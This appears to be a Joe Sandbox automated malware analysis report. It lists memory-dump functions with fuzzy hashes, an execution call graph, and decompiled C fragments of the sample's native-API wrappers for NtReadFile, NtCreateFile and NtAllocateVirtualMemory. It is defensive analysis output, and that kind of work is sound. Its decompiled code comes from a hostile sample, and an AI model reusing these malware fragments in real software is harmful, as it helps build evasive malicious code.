                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3970e82d5706dad91c9b52bfe88f4a4074ff9893e53722af82cd6dc9dd2cfdba
                                                        • Instruction ID: 9b1decb55c641144d9d2b41564f83e401116928e30a20610533f7143da325631
                                                        • Opcode Fuzzy Hash: 3970e82d5706dad91c9b52bfe88f4a4074ff9893e53722af82cd6dc9dd2cfdba
                                                        • Instruction Fuzzy Hash: E111F5B1D002498FDB10DFAAC8447EEBBF5AB88724F148829D419B7240CB79A944CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E09C78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E09CDE
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 9a90a28bfd60a265ce2fd918c7c329615af6e2a7d5b910ca19e340b4a47af5c7
                                                        • Instruction ID: 24624f604217be5594beffd79cb7811a0d4e7e199779c46dac8027c953465c68
                                                        • Opcode Fuzzy Hash: 9a90a28bfd60a265ce2fd918c7c329615af6e2a7d5b910ca19e340b4a47af5c7
                                                        • Instruction Fuzzy Hash: 2A11D2B5D002498FCB10CF9AC584ADEFBF4AB88624F14846AD419B7651C374A585CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B4438 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 086B449D
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 52f8278418e41da30d827067ae3274649c2da010b177c368c364cdf897618327
                                                        • Instruction ID: 0c105777290606424efb48c83dd98ec201ee0557b7f84eb2e65ce2d838213918
                                                        • Opcode Fuzzy Hash: 52f8278418e41da30d827067ae3274649c2da010b177c368c364cdf897618327
                                                        • Instruction Fuzzy Hash: D11122B58002499FCB10CF9AC588BDEBBF4EB48324F10841AE854A7201C374A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E09C77 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E09CDE
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 63f30540705a770e13f0d9b57d584e8e9cf3b28078c7fca60f24cebee43daa24
                                                        • Instruction ID: 83f551756451d8f7fe906546e86144018a48851ef84b34b4fd1d32eeb58d0a3a
                                                        • Opcode Fuzzy Hash: 63f30540705a770e13f0d9b57d584e8e9cf3b28078c7fca60f24cebee43daa24
                                                        • Instruction Fuzzy Hash: 5E11E3B6D00209CFCB10CF9AC5847DEFBF4AF48614F14845AD419B7651C374A585CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B4440 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 086B449D
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 5aa7c0ab90cf83ceb3e6f821bd7cbc49cf3cab9a259c4576ed46d843b9f7a31c
                                                        • Instruction ID: 175300d5a0afc21e29c24aef53b70ec145c2a00cadfa17040c012ee8f247f5d0
                                                        • Opcode Fuzzy Hash: 5aa7c0ab90cf83ceb3e6f821bd7cbc49cf3cab9a259c4576ed46d843b9f7a31c
                                                        • Instruction Fuzzy Hash: 911115B58003099FCB10CF9AC584BDEBBF8EB48324F108419E414B7200C374A584CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 014CD4C4 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448481186.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14cd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 638f246629efddd4a60ff4fd207988fe6dd072e9b1b183a8fbc1e3ae8c8154e9
                                                        • Instruction ID: 140ff7ea981c3bf6aa2bfe2e9083a8a8777c62471a009e914606ded4f8f88cb4
                                                        • Opcode Fuzzy Hash: 638f246629efddd4a60ff4fd207988fe6dd072e9b1b183a8fbc1e3ae8c8154e9
                                                        • Instruction Fuzzy Hash: 7E212479904240DFDB45DF58D8C0B27BF61FB98B28F20857ED8050B226C336D846C6E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 014DD01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448534835.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14dd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ded547a9f524debfa7eb70ac89e6c0cec97eece74878d9a0733082edcf0829d8
                                                        • Instruction ID: 532ed75cf59e81b45c14e78d4e67468ef6d8dc9aea5a9987dfae3660ef7638cb
                                                        • Opcode Fuzzy Hash: ded547a9f524debfa7eb70ac89e6c0cec97eece74878d9a0733082edcf0829d8
                                                        • Instruction Fuzzy Hash: 562125B1904240DFDF16DF58D8D0B16BBA5FBC4358F24C96AD84A0B396C336D847CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 014DD1D4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448534835.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14dd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 88cdc395bbf5ae10b229e8c439d332845a8ef135623aa452d638d8837552c88c
                                                        • Instruction ID: 6078aeae70fd96fbad43804f21207afa758c2002e2b79f0e0d09c6279d705308
                                                        • Opcode Fuzzy Hash: 88cdc395bbf5ae10b229e8c439d332845a8ef135623aa452d638d8837552c88c
                                                        • Instruction Fuzzy Hash: 05210771904240EFDF05DF98D9D0B26BBA5FB84324F24CA6ED8494B3A6C736D846CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 014DD005 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448534835.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14dd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4dfb8ecab0b6ebc778cc6d66c60bacd621a18f2c2b7d2bc8c7bf9b38add7105a
                                                        • Instruction ID: f56a66afba18cfcdd55c52660776db490fd0b90bab824e644d2640dab937c0d7
                                                        • Opcode Fuzzy Hash: 4dfb8ecab0b6ebc778cc6d66c60bacd621a18f2c2b7d2bc8c7bf9b38add7105a
                                                        • Instruction Fuzzy Hash: 342171755083809FCB03CF24D994712BF71EB86214F28C5EAD8458F6A7C33A9846CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 014CD4BF Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448481186.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14cd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                        • Instruction ID: e0f1637c572bcf92a51a9607975ee493391b53b4e681fe2c38260fb33784901a
                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                        • Instruction Fuzzy Hash: 1411DF76804280CFCB02CF14D9C0B16BF71FB84724F2486AED8440B62AC336D456CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 014DD1CF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448534835.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14dd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction ID: 5f68031fa4c3095d86f721d2a818634f6c7726d35a929100663a785e81e5a141
                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction Fuzzy Hash: 3A11BB75904280DFDB02CF54C5D0B16BBB1FB84324F28C6AED8494B7A6C33AD44ACB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 014CD745 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448481186.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14cd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7a39a3e89b4d4d89e60d253539089a20cb3f0fce67aa4f8eb01bbebc035d828
                                                        • Instruction ID: eb8cecfb01dcfca0ae5dd7c49f84411c6a91f94aac4a1c7874fdc97ab521a3da
                                                        • Opcode Fuzzy Hash: b7a39a3e89b4d4d89e60d253539089a20cb3f0fce67aa4f8eb01bbebc035d828
                                                        • Instruction Fuzzy Hash: C001D4799093C0AAE7615E59CC84B67BF98EF41A24F08853FE9051A356D3789841C6F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 014CD744 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448481186.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14cd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9675870ae6caee7cb4e0f78d71c413c81f81b8863b3b13eca23602612ced7c6f
                                                        • Instruction ID: 00683fd7258797aa698aa4f4098fc6ccebfbfd1efebf460ff199e9fc38a296e0
                                                        • Opcode Fuzzy Hash: 9675870ae6caee7cb4e0f78d71c413c81f81b8863b3b13eca23602612ced7c6f
                                                        • Instruction Fuzzy Hash: ECF0A4758052849EE7518E59CCC4B63FF98EB81634F18C46EED081B386C2749844CAB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:1.4%
                                                        Dynamic/Decrypted Code Coverage:3%
                                                        Signature Coverage:8.9%
                                                        Total number of Nodes:202
                                                        Total number of Limit Nodes:34
                                                        execution_graph 45991 41f180 45994 41b980 45991->45994 45993 41f18b 45995 41b9a6 45994->45995 46000 409d40 45995->46000 45997 41b9b2 45999 41b9c5 45997->45999 46006 40c1c0 9 API calls 45997->46006 45999->45993 46007 409c90 46000->46007 46002 409d54 46002->45997 46003 409d4d 46003->46002 46014 40f180 NtClose 46003->46014 46005 409d65 46005->45997 46006->45999 46009 409ca3 46007->46009 46008 409cb6 46008->46003 46009->46008 46015 41b2c0 46009->46015 46011 409cf3 46011->46008 46026 409ab0 46011->46026 46013 409d13 46013->46003 46014->46005 46016 41b2d9 46015->46016 46032 414a50 46016->46032 46018 41b2f1 46019 41b2fa 46018->46019 46061 41b100 46018->46061 46019->46011 46021 41b30e 46021->46019 46075 419f10 46021->46075 46029 409aca 46026->46029 46217 407ea0 46026->46217 46028 409ad1 46028->46013 46029->46028 46230 408160 46029->46230 46033 414b73 46032->46033 46037 414a64 46032->46037 46033->46018 46035 414bb7 46036 41bde0 RtlFreeHeap 46035->46036 46042 414bc3 46036->46042 46037->46033 46082 41a370 46037->46082 46038 414d49 46040 41a4a0 NtClose 46038->46040 46039 414d5f 46131 414790 NtReadFile NtClose 46039->46131 46043 414d50 46040->46043 46042->46033 46042->46038 46042->46039 46045 414c52 46042->46045 46043->46018 46044 414d72 46044->46018 46046 414cb9 46045->46046 46047 414c61 46045->46047 46046->46038 46053 414ccc 46046->46053 46048 414c66 46047->46048 46049 414c7a 46047->46049 46127 414650 NtClose 46048->46127 46051 414c97 46049->46051 46052 414c7f 46049->46052 46051->46043 46095 414410 46051->46095 46085 4146f0 46052->46085 46128 41a4a0 46053->46128 46054 414c70 46054->46018 46057 414c8d 46057->46018 46058 414caf 46058->46018 46060 414d38 46060->46018 46062 41b111 46061->46062 46063 41b123 46062->46063 46149 41bd60 46062->46149 46063->46021 46065 41b144 46152 414070 46065->46152 46067 41b190 46067->46021 46068 41b167 46068->46067 46069 414070 2 API calls 46068->46069 46071 41b189 46069->46071 46071->46067 46177 415390 46071->46177 46072 41b21a 46187 419ed0 46072->46187 46076 419f2c 46075->46076 46211 182967a 46076->46211 46077 419f47 46079 41bde0 46077->46079 46214 41a680 46079->46214 46081 41b369 46081->46011 46132 41af70 46082->46132 46084 41a38c NtCreateFile 46084->46035 46086 41470c 46085->46086 46087 414734 46086->46087 46088 414748 46086->46088 46089 41a4a0 NtClose 46087->46089 46090 41a4a0 NtClose 46088->46090 46091 41473d 46089->46091 46092 414751 46090->46092 46091->46057 46134 41bff0 RtlAllocateHeap 46092->46134 46094 41475c 46094->46057 46096 41445b 46095->46096 46097 41448e 46095->46097 46098 41a4a0 NtClose 46096->46098 46099 4144aa 46097->46099 46101 4145d9 46097->46101 46100 41447f 46098->46100 46102 4144e1 46099->46102 46103 4144cc 46099->46103 46100->46058 46108 41a4a0 NtClose 46101->46108 46104 4144e6 46102->46104 46105 4144fc 46102->46105 46106 41a4a0 NtClose 46103->46106 46107 41a4a0 NtClose 46104->46107 46114 414501 46105->46114 46135 41bfb0 46105->46135 46109 4144d5 46106->46109 46110 4144ef 46107->46110 46111 414639 46108->46111 46109->46058 46110->46058 46111->46058 46120 414513 46114->46120 46138 41a420 46114->46138 46115 414567 46116 414585 46115->46116 46117 41459a 46115->46117 46118 41a4a0 NtClose 46116->46118 46119 41a4a0 NtClose 46117->46119 46118->46120 46121 4145a3 46119->46121 46120->46058 46122 4145cf 46121->46122 46141 41bbb0 46121->46141 46122->46058 46124 4145ba 46125 41bde0 RtlFreeHeap 46124->46125 46126 4145c3 46125->46126 46126->46058 46127->46054 46129 41a4bc NtClose 46128->46129 46130 41af70 46128->46130 46129->46060 46130->46129 46131->46044 46133 41af80 46132->46133 46133->46084 46134->46094 46146 41a640 46135->46146 46137 41bfc8 46137->46114 46139 41a43c NtReadFile 46138->46139 46140 41af70 46138->46140 46139->46115 46140->46139 46142 41bbd4 46141->46142 46143 41bbbd 46141->46143 46142->46124 46143->46142 46144 41bfb0 RtlAllocateHeap 46143->46144 46145 41bbeb 46144->46145 46145->46124 46147 41af70 46146->46147 46148 41a65c RtlAllocateHeap 46147->46148 46148->46137 46191 41a550 46149->46191 46151 41bd8d 46151->46065 46153 414081 46152->46153 46154 414089 46152->46154 46153->46068 46176 41435c 46154->46176 46194 41cf50 46154->46194 46156 4140dd 46157 41cf50 RtlAllocateHeap 46156->46157 46160 4140e8 46157->46160 46158 414136 46161 41cf50 RtlAllocateHeap 46158->46161 46160->46158 46199 41cff0 46160->46199 46163 41414a 46161->46163 46162 41cf50 RtlAllocateHeap 46165 4141bd 46162->46165 46163->46162 46164 41cf50 RtlAllocateHeap 46172 414205 46164->46172 46165->46164 46167 414334 46206 41cfb0 RtlFreeHeap 46167->46206 46169 41433e 46207 41cfb0 RtlFreeHeap 46169->46207 46171 414348 46208 41cfb0 RtlFreeHeap 46171->46208 46205 41cfb0 RtlFreeHeap 46172->46205 46174 414352 46209 41cfb0 RtlFreeHeap 46174->46209 46176->46068 46178 4153a1 46177->46178 46179 414a50 5 API calls 46178->46179 46181 4153b7 46179->46181 46180 41540a 46180->46072 46181->46180 46182 4153f2 46181->46182 46183 415405 46181->46183 46184 41bde0 RtlFreeHeap 46182->46184 46185 41bde0 RtlFreeHeap 46183->46185 46186 4153f7 46184->46186 46185->46180 46186->46072 46188 419eec 46187->46188 46210 1829860 LdrInitializeThunk 46188->46210 46189 419f03 46189->46021 46192 41af70 46191->46192 46193 41a56c NtAllocateVirtualMemory 46192->46193 46193->46151 46195 41cf60 46194->46195 46196 41cf66 46194->46196 46195->46156 46197 41bfb0 RtlAllocateHeap 46196->46197 46198 41cf8c 46197->46198 46198->46156 46200 41d015 46199->46200 46202 41d04d 46199->46202 46201 41bfb0 RtlAllocateHeap 46200->46201 46203 41d02a 46201->46203 46202->46160 46204 41bde0 RtlFreeHeap 46203->46204 46204->46202 46205->46167 46206->46169 46207->46171 46208->46174 46209->46176 46210->46189 46212 1829681 46211->46212 46213 182968f LdrInitializeThunk 46211->46213 46212->46077 46213->46077 46215 41a69c RtlFreeHeap 46214->46215 46216 41af70 46214->46216 46215->46081 46216->46215 46218 407eb0 46217->46218 46219 407eab 46217->46219 46220 41bd60 NtAllocateVirtualMemory 46218->46220 46219->46029 46226 407ed5 46220->46226 46221 407f38 46221->46029 46222 419ed0 LdrInitializeThunk 46222->46226 46223 407f3e 46224 407f64 46223->46224 46227 41a5d0 LdrInitializeThunk 46223->46227 46224->46029 46226->46221 46226->46222 46226->46223 46228 41bd60 NtAllocateVirtualMemory 46226->46228 46233 41a5d0 46226->46233 46229 407f55 46227->46229 46228->46226 46229->46029 46231 40817e 46230->46231 46232 41a5d0 LdrInitializeThunk 46230->46232 46231->46013 46232->46231 46234 41a5ec 46233->46234 46237 18296e0 LdrInitializeThunk 46234->46237 46235 41a603 46235->46226 46237->46235 46238 1829660 LdrInitializeThunk

                                                        Executed Functions

                                                        Function 0041A41A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 41a41a-41a469 call 41af70 NtReadFile
                                                        C-Code - Quality: 25%
                                                        			E0041A41A(void* __ecx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
				intOrPtr _v0;
				void* _t20;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t35;

				asm("lodsb");
				 *((intOrPtr*)(__edx - 0x74aa29d4)) =  *((intOrPtr*)(__edx - 0x74aa29d4)) + __ecx;
				_t15 = _v0;
				_t33 = _v0 + 0xc48;
				E0041AF70(_t31, _v0, _t33,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t6 =  &_a36; // 0x414a31
				_t8 =  &_a28; // 0x414d72
				_t14 =  &_a4; // 0x414d72
				_t20 =  *((intOrPtr*)( *_t33))( *_t14, _a8, _a12, _a16, _a20, _a24,  *_t8, _a32,  *_t6, _t32, _t35, cs); // executed
				return _t20;
			}









                                                        0x0041a41b
                                                        0x0041a41c
                                                        0x0041a423
                                                        0x0041a42f
                                                        0x0041a437
                                                        0x0041a43c
                                                        0x0041a442
                                                        0x0041a45d
                                                        0x0041a465
                                                        0x0041a469

                                                        APIs
                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A465
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: 1JA$rMA$rMA
                                                        • API String ID: 2738559852-782607585
                                                        • Opcode ID: 7cef21edbfbccbfc31dadf7b1b626fbf065f0b8d0a8c28913a23cb3ae2dcbcfd
                                                        • Instruction ID: 82e1c0b5f6663241e0a7dc0ec794f0da47cbc8f95d1202383f3b0bd63db2f2f1
                                                        • Opcode Fuzzy Hash: 7cef21edbfbccbfc31dadf7b1b626fbf065f0b8d0a8c28913a23cb3ae2dcbcfd
                                                        • Instruction Fuzzy Hash: 9EF0F9B6200109AFCB04DF99DC84DEB7BA9EF8C354F158259BE0D97241C634E851CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A420 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3 41a420-41a436 4 41a43c-41a469 NtReadFile 3->4 5 41a437 call 41af70 3->5 5->4
                                                        C-Code - Quality: 37%
                                                        			E0041A420(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF70(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                        0x0041a423
                                                        0x0041a42f
                                                        0x0041a437
                                                        0x0041a43c
                                                        0x0041a442
                                                        0x0041a45d
                                                        0x0041a465
                                                        0x0041a469

                                                        APIs
                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A465
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: 1JA$rMA$rMA
                                                        • API String ID: 2738559852-782607585
                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction ID: 853ae5a9cbf7dd52acbc9bf2bbd942333817209f7ae892279ddd8fb5cf099807
                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction Fuzzy Hash: EBF0A4B6200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97251D630E8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A370 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 97 41a370-41a3c1 call 41af70 NtCreateFile
                                                        C-Code - Quality: 100%
                                                        			E0041A370(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF70(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                        0x0041a37f
                                                        0x0041a387
                                                        0x0041a3bd
                                                        0x0041a3c1

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3BD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction ID: db220115459d8e284863bd9c0c46ad68448eb9d788840dc0e4734df984f4989a
                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction Fuzzy Hash: C3F0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A550 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 100 41a550-41a58d call 41af70 NtAllocateVirtualMemory
                                                        C-Code - Quality: 100%
                                                        			E0041A550(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF70(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                        0x0041a55f
                                                        0x0041a567
                                                        0x0041a589
                                                        0x0041a58d

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B144,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A589
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction ID: 0e5d983f4d7433d3b56fd13b6aea7c1fda5e5f7f579047cba8cb0cdbad6970d5
                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction Fuzzy Hash: 0BF015B6200208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A4A0 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 109 41a4a0-41a4b6 110 41a4bc-41a4c9 NtClose 109->110 111 41a4b7 call 41af70 109->111 111->110
                                                        C-Code - Quality: 100%
                                                        			E0041A4A0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
